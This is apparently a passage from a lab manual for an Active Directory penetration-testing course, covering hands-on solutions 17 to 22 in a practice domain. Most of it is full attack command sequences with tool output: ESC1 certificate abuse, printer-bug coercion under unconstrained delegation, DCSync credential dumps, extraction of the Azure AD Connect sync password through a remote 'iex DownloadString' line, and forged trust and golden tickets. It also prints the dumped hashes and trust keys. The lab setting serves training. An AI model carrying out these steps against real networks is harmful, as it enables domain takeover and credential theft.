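    # Constructed: subject supplied by the enrollee, but no authentication EKU.
    {"CA Name": CA, "Template Name": "WebServerConstructed",
     "msPKI-Certificates-Name-Flag": ["ENROLLEE_SUPPLIES_SUBJECT"],
     "mspki-enrollment-flag": ["INCLUDE_SYMMETRIC_ALGORITHMS", "PUBLISH_TO_DS"],
     "Authorized Signatures Required": 0,
     "pkiextendedkeyusage": ["Server Authentication"],
     "Enrollment Rights": ["US\\webadmins"]},
    # Constructed: same as the abusable template, but gated by manager approval.
    {"CA Name": CA, "Template Name": "PAWApprovedConstructed",
     "msPKI-Certificates-Name-Flag": ["ENROLLEE_SUPPLIES_SUBJECT"],
     "mspki-enrollment-flag": ["PUBLISH_TO_DS", "PEND_ALL_REQUESTS"],
     "Authorized Signatures Required": 0,
     "pkiextendedkeyusage": ["Client Authentication"],
     "Enrollment Rights": ["US\\pawadmin"]},
]

if __name__ == "__main__":
    by_name = {t["Template Name"]: t for t in TEMPLATES}
    for name, who in esc1_findings(TEMPLATES):
        print(f"[ESC1] {name}: enrollable by {', '.join(who)}")
        print("       " + remediation(by_name[name]))
```

The same checks apply to the raw pKICertificateTemplate objects under CN=Certificate Templates,CN=Public Key Services,CN=Services in the Configuration partition, which is where Certify reads them from; the `mspki-certificate-name-flag` bit for ENROLLEE_SUPPLIES_SUBJECT is 0x1.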

C:\AD\Tools>C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject
[snip]
CA Name : Techcorp-DC.techcorp.local\TECHCORP-DC-CA
Template Name : ForAdminsofPrivilegedAccessWorkstations
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS,
PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting
File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting
File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : TECHCORP\Domain Admins S-1-5-21-2781415573-3701854478-2406986946-512
TECHCORP\Enterprise Admins S-1-5-21-2781415573-3701854478-2406986946-519
US\pawadmin S-1-5-21-210670787-2521448726-163245708-1138
[snip]

Recall that we extracted the certificate of pawadmin from us-jump. Use the certificate to request a TGT for pawadmin and inject it into the current session:

C:\AD\Tools>C:\AD\Tools\Rubeus.exe asktgt /user:pawadmin /certificate:C:\AD\Tools\pawadmin.pfx /password:SecretPass@123 /nowrap /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Ask TGT

[snip]
[+] Ticket successfully imported!

ServiceName : krbtgt/us.techcorp.local
ServiceRealm : US.TECHCORP.LOCAL
UserName : pawadmin
UserRealm : US.TECHCORP.LOCAL
[snip]

Now, from the above session that has the privileges of pawadmin, request a certificate for the Domain Administrator (Administrator). Note that Certify will still show the context as studentuserx; you can ignore that.

C:\AD\Tools>C:\AD\Tools\Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Request a Certificates

[*] Current user context : US\studentuserx

[*] No subject name specified, using current context as subject.

[*] Template : ForAdminsofPrivilegedAccessWorkstations

[*] Subject : CN=studentuserx, CN=Users, DC=us, DC=techcorp, DC=local
[*] AltName : Administrator

[*] Certificate Authority : Techcorp-DC.techcorp.local\TECHCORP-DC-CA

[*] CA Response : The certificate had been issued.

[*] Request ID : 28

[*] cert.pem :

-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEA…
[snip]
-----END CERTIFICATE-----
[snip]



Copy all the text between -----BEGIN RSA PRIVATE KEY----- and -----END CERTIFICATE----- and save it to cert.pem.

We need to convert it to PFX before Rubeus can use it. Use the openssl binary on the student VM to do that; SecretPass@123 is used as the export password.

C:\AD\Tools>C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\DA.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:
unable to write 'random state'

Finally, request a TGT for the DA using the certificate and inject it into the current session:

C:\AD\Tools>C:\AD\Tools\Rubeus.exe asktgt /user:Administrator /certificate:C:\AD\Tools\DA.pfx /password:SecretPass@123 /nowrap /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=studentuserx, CN=Users, DC=us, DC=techcorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'us.techcorp.local\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):

doI…
[snip]

Let's try to access the us-dc to confirm our privileges!

C:\AD\Tools>winrs -r:us-dc whoami
us\administrator

Similarly, we can get Enterprise Admin privileges. The certificate itself only carries AltName Administrator; as the next steps show, the same certificate request yields a TGT for the Administrator of whichever domain's DC we ask, so nothing changes on the Certify side.

Use the following command to request the certificate (the same command as used previously):

C:\AD\Tools>C:\AD\Tools\Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator
[snip]

Copy all the text between -----BEGIN RSA PRIVATE KEY----- and -----END
CERTIFICATE----- and save it to cert.pem. We need to convert it to PFX to use it. Use openssl
binary on the student VM to do that. I will use SecretPass@123 as the export password.

C:\AD\Tools>C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\EA.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:
unable to write 'random state'

Finally, request and inject the EA TGT in the current session. Note that here we specify the user to be the Enterprise Admin techcorp.local\Administrator and point Rubeus at the forest root DC with /dc:

C:\AD\Tools>C:\AD\Tools\Rubeus.exe asktgt /user:techcorp.local\Administrator /dc:techcorp-dc.techcorp.local /certificate:C:\AD\Tools\EA.pfx /password:SecretPass@123 /nowrap /ptt

Let's access the forest root DC!

C:\AD\Tools>winrs -r:techcorp-dc whoami
techcorp\administrator

Hands-On 18:
Task
• Abuse the Unconstrained Delegation on us-web to get Enterprise Admin privileges on
techcorp.local.

Solution
Recall that we compromised us-web (which has Unconstrained Delegation enabled) in a previous Hands-On and used the printer bug to compromise us.techcorp.local.

We can use a similar method to compromise techcorp.local.

Start a new process as webmaster, who has admin privileges on us-web:

C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgt /domain:us.techcorp.local /user:webmaster /aes256:2a653f166761226eb2e939218f5a34d3d2af005a91f160540da6e4a5e29de8a0 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
[snip]
[snip]

Copy Rubeus.exe to us-web and start monitoring for any TGT arriving from techcorp-dc. Run the below commands in the process running as webmaster:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Rubeus.exe \\us-web\C$\Users\Public\Rubeus.exe /Y
[snip]

C:\Windows\system32>winrs -r:us-web cmd.exe
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\webmaster>C:\Users\Public\Rubeus.exe monitor /targetuser:TECHCORP-DC$ /interval:5 /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: TGT Monitoring


[*] Target user : TECHCORP-DC$
[*] Monitoring every 5 seconds for new TGTs

Next, run MS-RPRN.exe on the student VM to abuse the printer bug. Note that this time we target techcorp-dc. The call asks the print spooler on techcorp-dc to send a change notification to us-web, so techcorp-dc authenticates to us-web with Kerberos as its machine account; because us-web is trusted for unconstrained delegation, that service ticket carries a forwarded TGT of TECHCORP-DC$, which is what Rubeus monitor catches:

C:\AD\Tools>C:\AD\Tools\MS-RPRN.exe \\techcorp-dc.techcorp.local \\us-web.us.techcorp.local
Attempted printer notification and received an invalid handle. The coerced authentication probably worked!

On the session where Rubeus is running, we can see:

[snip]
[*] 1/15/2021 7:54:22 AM UTC - Found new TGT:

User : TECHCORP-DC$@TECHCORP.LOCAL
StartTime : 1/14/2021 8:06:19 PM
EndTime : 1/15/2021 6:06:15 AM
RenewTill : 12/31/1969 4:00:00 PM
Flags : name_canonicalize, pre_authent, forwarded, forwardable
Base64EncodedTicket :
[snip]

[*] Ticket cache size: 1

^C

We can copy Base64EncodedTicket, remove unnecessary spaces and newlines (if any) and use the ticket with Rubeus on the student VM:

C:\AD\Tools>C:\AD\Tools\Rubeus.exe ptt /ticket:TGTofTECHCORP-DC$
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Import Ticket


[+] Ticket successfully imported!

We can now run a DCSync attack against TECHCORP-DC using the injected ticket. This works because a domain controller's machine account holds the replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) on its domain, so its TGT is all DCSync needs:

C:\AD\Tools>C:\AD\Tools\SharpKatz.exe --Command dcsync --User techcorp\administrator --Domain techcorp.local --DomainController techcorp-dc.techcorp.local
[*]
[*] System Information
[*] ----------------------------------------------------------------------
[*] | Platform: Win32NT |
[*] ----------------------------------------------------------------------
[*] | Major: 10 | Minor: 0 | Build: 17763 |
[*] ----------------------------------------------------------------------
[*] | Version: Microsoft Windows NT 6.2.9200.0 |
[*] ----------------------------------------------------------------------
[*]
[!] techcorp.local will be the domain
[!] techcorp-dc.techcorp.local will be the DC server
[!] techcorp\administrator will be the user account
[*]
[*] Object RDN : Administrator
[*]
[*] ** SAM ACCOUNT **
[*]
[*] SAM Username : Administrator
[*] User Principal Name :
[*] Account Type : USER_OBJECT
[*] User Account Control : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD
[*] Account expiration : 12/31/9999 11:59:59 PM
[*] Password last change : 7/4/2019 3:01:32 AM
[*] Object Security ID : S-1-5-21-2781415573-3701854478-2406986946-500
[*] Object Relative ID : 500
[*]
[*] Credents:
[*] Hash NTLM : bc4cf9b751d196c4b6e1a2ba923ef33f
[*] ntlm- 0 : bc4cf9b751d196c4b6e1a2ba923ef33f
[*] lm - 0 : 6ac43f8c5f2e6ddab0f85e76d711eab8
[*]
[*] Supplemental Credents:
[*]
[*] * Primary:NTLM-Strong-NTOWF
[*] Random Value : f94f43f24957c86f1a2d359b7585b940
[*]
[*] * Primary:Kerberos-Newer-Keys
[*] Default Salt :TECHCORP.LOCALAdministrator
[*] Credents
[*] aes256_hmac 4096: 58db3c598315bf030d4f1f07021d364ba9350444e3f391e167938dd998836883
[*] aes128_hmac 4096: 1470b3ca6afc4146399c177ab08c5d29
[*] des_cbc_md5 4096: c198a4545e6d4c94
[snip]

Hands-On 19:
Task
• Find out the machine where Azure AD Connect is installed.
• Compromise the machine and extract the password of AD Connect user in clear-text.
• Using the AD Connect user's password, extract secrets from us-dc and techcorp-dc.

Solution
We can find out the machine where Azure AD Connect is installed by looking at the Description of the special synchronization account whose name begins with MSOL_; the installer writes the host name and the tenant into that attribute.

Using the Active Directory module after loading it from InvisiShell:

PS C:\AD\Tools> Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Server techcorp.local -Properties * | select SamAccountName,Description | fl

SamAccountName : MSOL_16fb75d0227d
Description : Account created by Microsoft Azure Active Directory Connect
with installation identifier 16fb75d0227d4957868d5c4ae0688943 running on
computer US-ADCONNECT configured to synchronize to tenant
techcorpus.onmicrosoft.com. This account must have directory replication
permissions in the local Active Directory and write permission on certain
attributes to enable Hybrid Deployment.
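
The description above is the only attribute that ties the MSOL_ account to its host, and it has a fixed format, so it can be parsed rather than read by eye. The following is an added example for this manual, not lab tooling: a small Python parser over user records shaped like the Get-ADUser output above (for instance from an LDAP or BloodHound export). The sample records are constructed, and the cross-check between the account name suffix and the installation identifier is an assumption drawn from the naming seen above.

```python
"""Find the Azure AD Connect server from MSOL_ account descriptions.

Added example for this section, not lab tooling. Operates on plain dicts
shaped like Get-ADUser output so it runs offline; the sample records are constructed.
"""
import re

# Text AAD Connect writes into the MSOL_ account's description (quoted in full above).
MSOL_PATTERN = re.compile(
    r"installation identifier (?P<install_id>[0-9a-fA-F]{32}) "
    r"running on computer (?P<computer>\S+) "
    r"configured to synchronize to tenant (?P<tenant>\S+?)\.(?:\s|$)",
    re.IGNORECASE,
)


def parse_msol_description(description):
    """Return {'install_id', 'computer', 'tenant'} or None if the text does not match."""
    match = MSOL_PATTERN.search(description or "")
    return match.groupdict() if match else None


def find_adconnect_servers(users):
    """Map each genuine MSOL_ account to the host AAD Connect runs on.

    Assumption (from the naming seen above): the 12 hex characters after
    'MSOL_' are the prefix of the installation identifier. A record whose
    name and description disagree is reported as suspicious rather than
    trusted, because the description is a writable attribute.
    """
    servers, suspicious = [], []
    for user in users:
        sam = user.get("samAccountName", "")
        if not sam.upper().startswith("MSOL_"):
            continue
        parsed = parse_msol_description(user.get("description"))
        if parsed and parsed["install_id"].lower().startswith(sam[5:].lower()):
            servers.append({"account": sam, **parsed})
        else:
            suspicious.append(sam)
    return servers, suspicious


# Constructed sample modelled on the output above; not a real directory dump.
SAMPLE_USERS = [
    {
        "samAccountName": "MSOL_16fb75d0227d",
        "description": (
            "Account created by Microsoft Azure Active Directory Connect with "
            "installation identifier 16fb75d0227d4957868d5c4ae0688943 running on "
            "computer US-ADCONNECT configured to synchronize to tenant "
            "techcorpus.onmicrosoft.com. This account must have directory "
            "replication permissions in the local Active Directory and write "
            "permission on certain attributes to enable Hybrid Deployment."
        ),
    },
    {"samAccountName": "MSOL_deadbeef0000", "description": "decoy left by an admin"},
    {"samAccountName": "studentuserx", "description": None},
]

if __name__ == "__main__":
    found, odd = find_adconnect_servers(SAMPLE_USERS)
    for entry in found:
        print(f"{entry['account']}: AAD Connect on {entry['computer']} -> tenant {entry['tenant']}")
    if odd:
        print("MSOL_-like accounts without a matching description:", ", ".join(odd))
```

Feed it the user objects of a domain export and it returns the host that needs to be compromised for the next step (us-adconnect in this lab), plus any MSOL_-looking accounts whose description does not match their name, which deserve a second look before trusting them.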

Recall that we already have administrative access to us-adconnect as helpdeskadmin. With that access,
we can extract credentials of MSOL_16fb75d0227d account in clear-text. We will use the adconnect.ps1
script for that.

Connect to us-adconnect as helpdeskadmin. Run the below command from an elevated shell on the student VM to start a cmd.exe as helpdeskadmin:

C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgt /domain:us.techcorp.local /user:helpdeskadmin /aes256:f3ac0c70b3fdb36f25c0d5c9cc552fe9f94c39b705c4088a2bb7219ae9fb6534 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
[snip]

In the new process, run the following commands to copy InvisiShell to the us-adconnect machine and use it:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\InviShell\InShellProf.dll \\us-adconnect\C$\Users\helpdeskadmin\Downloads\InShellProf.dll /Y
Does \\us-adconnect\C$\Users\helpdeskadmin\Downloads\InShellProf.dll specify a file name
or directory name on the target
(F = file, D = directory)? F
C:\AD\Tools\InviShell\InShellProf.dll
1 File(s) copied

C:\Windows\system32>echo F | xcopy C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat \\us-adconnect\C$\Users\helpdeskadmin\Downloads\RunWithRegistryNonAdmin.bat /Y
Does \\us-adconnect\C$\Users\helpdeskadmin\Downloads\RunWithRegistryNonAdmin.bat specify a file name
or directory name on the target
(F = file, D = directory)? F
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
1 File(s) copied

C:\Windows\system32>winrs -r:us-adconnect cmd
Microsoft Windows [Version 10.0.17763.1613]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\helpdeskadmin>cd C:\Users\helpdeskadmin\Downloads

C:\Users\helpdeskadmin\Downloads>RunWithRegistryNonAdmin.bat
[snip]

Now we have a PowerShell session from InvisiShell ready on us-adconnect. Next, host adconnect.ps1 on a local web server on the student VM and run the below commands on us-adconnect to extract the credentials of the MSOL_ account. The script reads the encrypted configuration from the ADSync LocalDB and, as its output shows, uses xp_cmdshell to run the decryption as the ADSync service account, which is why it has to run on the AD Connect host itself:

PS C:\Users\helpdeskadmin\Downloads> iex (New-Object Net.WebClient).DownloadString('http://192.168.100.x/adconnect.ps1')
PS C:\Users\helpdeskadmin\Downloads> ADconnect
AD Connect Sync Credential Extract POC (@_xpn_)

AD Connect Sync Credential Extract v2 (@_xpn_)
[ Updated to support new cryptokey storage method ]

[*] Querying ADSync localdb (mms_server_configuration)
[*] Querying ADSync localdb (mms_management_agent)
[*] Using xp_cmdshell to run some Powershell as the service user
[*] Credentials incoming...

Domain: techcorp.local
Username: MSOL_16fb75d0227d
Password: 70&n1{p!Mb7K.C)/USO.a{@m*%.+^230@KAc[+sr}iF>Xv{1!{=/}}3B.T8IW-{)^Wj^zbyOc=Ahi]n=S7K$wAr;sOlb7IFh}!%J.o0}?zQ8]fp&.5w+!!IaRSD@qYf

Now, we can use this password to run DCSync attacks against the target domain (techcorp.local in the present case), since the MSOL_ account holds the directory replication permissions its description mentions. Run the below command from an elevated shell on the student VM:

C:\Windows\system32>runas /user:techcorp.local\MSOL_16fb75d0227d /netonly cmd
Enter the password for techcorp.local\MSOL_16fb75d0227d:
Attempting to start cmd as user "techcorp.local\MSOL_16fb75d0227d" ...

In the new process:

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync
/user:techcorp\administrator /domain:techcorp.local" "exit"
[snip]

Note that the runas command itself does not need an elevated shell. We used one only because SafetyKatz checks whether it is running from a high-integrity process, even though DCSync does not require one (it is directory replication over RPC, authorized by the account's replication rights in AD, not by local privilege). The same attack runs without administrator privileges on the student VM using the below commands:

C:\Users\studentuser23>runas /user:techcorp.local\MSOL_16fb75d0227d /netonly cmd
Enter the password for techcorp.local\MSOL_16fb75d0227d:
Attempting to start cmd as user "techcorp.local\MSOL_16fb75d0227d" ...

In the new process, run the following commands for DCSync:

C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
PS C:\Windows\system32> . C:\AD\Tools\Invoke-Mimi.ps1
PS C:\Windows\system32> Invoke-Mimi -Command '"lsadump::dcsync
/user:techcorp\administrator /domain:techcorp.local"'

.#####.   mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > http://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
'#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # lsadump::dcsync /user:techcorp\administrator /domain:techcorp.local
[DC] 'techcorp.local' will be the domain
[DC] 'Techcorp-DC.techcorp.local' will be the DC server
[DC] 'techcorp\administrator' will be the user account

Object RDN : Administrator

** SAM ACCOUNT **

SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 7/4/2019 2:01:32 AM
Object Security ID : S-1-5-21-2781415573-3701854478-2406986946-500
Object Relative ID : 500

Credentials:
Hash NTLM: bc4cf9b751d196c4b6e1a2ba923ef33f
ntlm- 0: bc4cf9b751d196c4b6e1a2ba923ef33f
ntlm- 1: c87a64622a487061ab81e51cc711a34b
lm - 0: 6ac43f8c5f2e6ddab0f85e76d711eab8

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : f94f43f24957c86f1a2d359b7585b940

* Primary:Kerberos-Newer-Keys *
Default Salt : TECHCORP.LOCALAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) :
58db3c598315bf030d4f1f07021d364ba9350444e3f391e167938dd998836883
aes128_hmac (4096) : 1470b3ca6afc4146399c177ab08c5d29
des_cbc_md5 (4096) : c198a4545e6d4c94

Hands-On 20:
Task
• Using DA access to us.techcorp.local, escalate privileges to Enterprise Admin or DA to the parent
domain, techcorp.local using the domain trust key.

Solution
We need the trust key, which can be retrieved using the DA privileges.

Run the below command on the student VM from an elevated shell:

C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgt /user:administrator /aes256:db7bd8e34fada016eb0e292816040a1bf4eeb25cd3843e041d0278d30dc1b335 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
[snip]

In the new process, run the following commands. Remember to host SafetyKatz on a local web server on the student VM. The netsh portproxy rule makes us-dc listen on its own port 8080 and relay to that web server (192.168.100.x:80), so the download URL Loader.exe uses is a loopback address while the DC's TCP stack forwards the request to the student VM. Note that we are looking for the [In] key of the us.techcorp.local to techcorp.local trust:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Loader.exe \\us-dc\C$\Users\Public\Loader.exe /Y
[snip]
C:\Windows\system32>winrs -r:us-dc cmd
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Administrator>netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=192.168.100.x
C:\Users\Administrator>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
[snip]

mimikatz # lsadump::trust /patch

[snip]
Current domain: US.TECHCORP.LOCAL (US / S-1-5-21-210670787-2521448726-163245708)
Domain: TECHCORP.LOCAL (TECHCORP / S-1-5-21-2781415573-3701854478-2406986946)
[ In ] US.TECHCORP.LOCAL -> TECHCORP.LOCAL
* 1/7/2021 6:05:50 AM - CLEAR - ad 68 50 7f 52 d5 e8 06 da 6e 82 76 6b
83 79 30 2a 56 7d 59 dc bc 90 00 35 8d 4b 85 e5 e1 05 2a b7 b2 ea 69 58 08 f3
8f bc 9d 85 3c bf 20 e8 db d9 90 ae 3a ac 26 de 59 ff bc 4d c6 01 a5 4a 01 73
fa 6d 0c 83 65 67 1e 05 06 8a 88 20 09 c3 74 49 3a a7 10 81 d2 bd 50 d7 38 3d
5c 3b 9d b1 6f f7 22 60 e5 16 d5 70 2a f4 d0 b2 72 75 6b 4b ef ac 87 dd 25 9d
17 d2 18 86 9f dd a6 98 60 c0 61 8d 81 38 6e c4 1c 87 9e ad 6e 27 53 cc 7c bb
d9 cf e8 97 dd 9a c6 df a1 24 de 86 b8 79 45 98 28 83 9a c7 3f 10 ee ef 1f ba
6a 02 16 50 95 92 30 be b6 40 6c 09 47 43 31 3e 70 72 3c 7b 36 f7 a4 b8 01 ed
da 40 1d a0 89 e1 fd 47 dc 9a ac 6c 28 04 bf 5a 21 48 ff 1c 7f 6f ab 90 5c 5b
4e f3 33 c9 75 92 f5 90 fd 2d e6 66 58 98 5a 50 5e ad 3f
* aes256_hmac 470bb30b339656448e529c5804ef374b05c12d5e4bc8223cdce5ce9f0748b0c8
* aes128_hmac e1f49a05e66a388ef460d32d42083574
* rc4_hmac_nt 9fb9e247a02e6fde1631efa7fedce6a2
[snip]

Let's create the inter-realm TGT using the trust key that we got above: a referral ticket for techcorp.local's krbtgt service, encrypted with the trust's rc4_hmac_nt key and carrying the Enterprise Admins SID of techcorp.local (RID 519) in SID History. The parent-child trust is within the forest, so SID filtering does not strip that extra SID. Note that the trust key may be different for your lab and may change over time even in the same lab instance, since trust passwords are rotated automatically.

Run the below command from an elevated shell on the student VM:

C:\Windows\system32>C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708
/sids:S-1-5-21-2781415573-3701854478-2406986946-519
/rc4:9fb9e247a02e6fde1631efa7fedce6a2 /user:Administrator /service:krbtgt
/target:techcorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi" "exit"

[snip]
User      : Administrator
Domain    : us.techcorp.local (US)
SID       : S-1-5-21-210670787-2521448726-163245708
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2781415573-3701854478-2406986946-519 ;
ServiceKey: 9fb9e247a02e6fde1631efa7fedce6a2 - rc4_hmac_nt
Service   : krbtgt
Target    : techcorp.local
Lifetime  : 1/15/2021 2:03:50 AM ; 1/13/2031 2:03:50 AM ; 1/13/2031 2:03:50 AM
-> Ticket : C:\AD\Tools\trust_tkt.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

Now, use Rubeus to request a TGS for CIFS on the forest root domain controller using the TGT generated
above.

C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgs
/ticket:C:\AD\Tools\trust_tkt.kirbi /service:CIFS/techcorp-dc.techcorp.local
/dc:techcorp-dc.techcorp.local /ptt
[snip]

Check if the ticket is granted:

C:\Windows\system32>klist

Current LogonId is 0:0x516bb5d

Cached Tickets: (1)

#0> Client: Administrator @ us.techcorp.local
Server: CIFS/techcorp-dc.techcorp.local @ TECHCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40250000 -> forwardable pre_authent ok_as_delegate
name_canonicalize
Start Time: 1/15/2021 2:23:12 (local)
End Time: 1/15/2021 12:23:12 (local)
Renew Time: 0
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

Finally, let's access the filesystem on techcorp-dc. Run the below command from the command prompt
where TGS is injected:

C:\Windows\system32>dir \\techcorp-dc.techcorp.local\c$
Volume in drive \\techcorp-dc.techcorp.local\c$ has no label.
Volume Serial Number is 88AD-6C8B

Directory of \\techcorp-dc.techcorp.local\c$

07/10/2019 08:00 AM <DIR> ExchangeSetupLogs
12/07/2020 02:51 AM <DIR> PerfLogs
01/07/2021 10:03 PM <DIR> Program Files
07/17/2019 10:02 PM <DIR> Program Files (x86)
01/07/2021 11:50 PM <DIR> Transcripts
07/18/2019 08:48 AM <DIR> Users
01/07/2021 10:03 PM <DIR> Windows
0 File(s) 0 bytes
7 Dir(s) 15,823,593,472 bytes free

Hands-On 21:
Task
• Using DA access to us.techcorp.local, escalate privileges to Enterprise Admin or DA to the parent
domain, techcorp.local using the krbtgt hash of us.techcorp.local.

Solution
We already have the krbtgt hash of us.techcorp.local. Let's create a golden ticket for us.techcorp.local whose SID History carries the Enterprise Admins SID of techcorp.local (RID 519). When this TGT is used against a techcorp.local resource, us-dc issues the inter-realm referral with the extra SID intact, because SID filtering is not enforced on trusts within a forest. Run the below command from an elevated shell on the student VM:

C:\Windows\system32>C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/user:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-
2521448726-163245708 /krbtgt:b0975ae49f441adc6b024ad238935af5 /sids:S-1-5-21-
2781415573-3701854478-2406986946-519 /ptt" "exit"

[snip]

Golden ticket for 'Administrator @ us.techcorp.local' successfully submitted for current session

Check for the ticket:

C:\Windows\system32>klist

Current LogonId is 0:0x531ae90

Cached Tickets: (1)

#0> Client: Administrator @ us.techcorp.local
Server: krbtgt/us.techcorp.local @ us.techcorp.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 1/15/2021 2:47:44 (local)
End Time: 1/13/2031 2:47:44 (local)
Renew Time: 1/13/2031 2:47:44 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

Try accessing resources on the root DC:

C:\Windows\system32>dir \\techcorp-dc.techcorp.local\c$
Volume in drive \\techcorp-dc.techcorp.local\c$ has no label.
Volume Serial Number is 88AD-6C8B

Directory of \\techcorp-dc.techcorp.local\c$

07/10/2019 08:00 AM <DIR> ExchangeSetupLogs
12/07/2020 02:51 AM <DIR> PerfLogs
01/07/2021 10:03 PM <DIR> Program Files
07/17/2019 10:02 PM <DIR> Program Files (x86)
01/07/2021 11:50 PM <DIR> Transcripts
07/18/2019 08:48 AM <DIR> Users
01/07/2021 10:03 PM <DIR> Windows
0 File(s) 0 bytes
7 Dir(s) 15,823,523,840 bytes free

C:\Windows\system32>winrs -r:techcorp-dc cmd
Microsoft Windows [Version 10.0.17763.1613]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Administrator.US>hostname
hostname
Techcorp-DC

C:\Users\Administrator.US>whoami
whoami
us\administrator

C:\Users\Administrator.US>exit
exit

Hands-On 22:
Task
• Find a service account in the eu.local forest and Kerberoast its password.

Solution
Using the Active Directory module, enumerate accounts with an SPN in every external or forest trust of the current domain (the filter drops intra-forest trusts). Kerberoasting across a trust works because our own TGT gets us a referral ticket for the other realm, which is enough to request a service ticket there:
C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-
master\Microsoft.ActiveDirectory.Management.dll
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-
master\ActiveDirectory\ActiveDirectory.psd1
